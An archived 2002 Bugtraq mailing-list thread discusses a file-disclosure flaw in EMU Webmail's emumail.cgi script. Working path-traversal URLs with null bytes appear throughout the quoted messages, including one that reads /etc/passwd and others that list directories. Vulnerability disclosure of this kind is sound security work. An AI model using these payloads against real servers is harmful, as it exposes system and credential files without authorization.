Re: emumail.cgi

From: MegaHz (adminat_private)
Date: Sat Apr 06 2002 - 04:39:15 PST

Next message: Mary Landesman: "RE: More Office XP problems"

Previous message: Coffin, Chris: "Unauthorized remote control access to systems running Funk Softwa re's Proxy v3.x"
Next in thread: Randal L. Schwartz: "Re: emumail.cgi"
Reply: Randal L. Schwartz: "Re: emumail.cgi"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

u can also do this:
http://site/emumail.cgi?type=/../../../../../etc/passwd%00

but u cannot do this:
http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

/* 
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */


----- Original Message ----- 
From: "N|ghtHawk" <nighthawkat_private>
To: <bugtraqat_private>
Sent: Friday, April 05, 2002 3:10 AM
Subject: Re: emumail.cgi


> >name            : emumail.cgi
> >date            : 04/04/2002
> >description     : EMU Webmail: how to check your email
> >from the web. 
> >severity        : Low/average-risk
> >homepage        : www.emumail.com
> >
> >Any user can view files on the remote system:
> >xxx/PATH/emumail.cgi?type=FILE%00
> >
> >
> >
> >The vendor were contact about that
> >
> 
> http://site/emumail.cgi?type=.%00
> 
> Seems to give the directory index of the current directory.
> 
> http://site/emumail.cgi?type=..%00
> 
> Seems to give the directory index of ../
> 
> -- 
> N|ghtHawk
> http://www.hackers4hackers.org
> 
> 
> 
>

Next message: Mary Landesman: "RE: More Office XP problems"
Previous message: Coffin, Chris: "Unauthorized remote control access to systems running Funk Softwa re's Proxy v3.x"
Next in thread: Randal L. Schwartz: "Re: emumail.cgi"
Reply: Randal L. Schwartz: "Re: emumail.cgi"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 20:12:50 PDT